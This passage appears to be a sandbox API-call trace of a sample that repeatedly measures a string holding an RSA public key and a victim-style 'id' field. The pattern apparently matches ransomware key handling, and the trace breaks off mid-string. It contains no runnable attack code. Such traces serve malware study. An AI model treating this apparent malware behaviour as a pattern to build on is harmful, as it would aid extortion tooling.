KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.857] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.857] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.857] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.857] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.858] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.858] lstrlenA (lpString="-----BEGIN PUBLIC 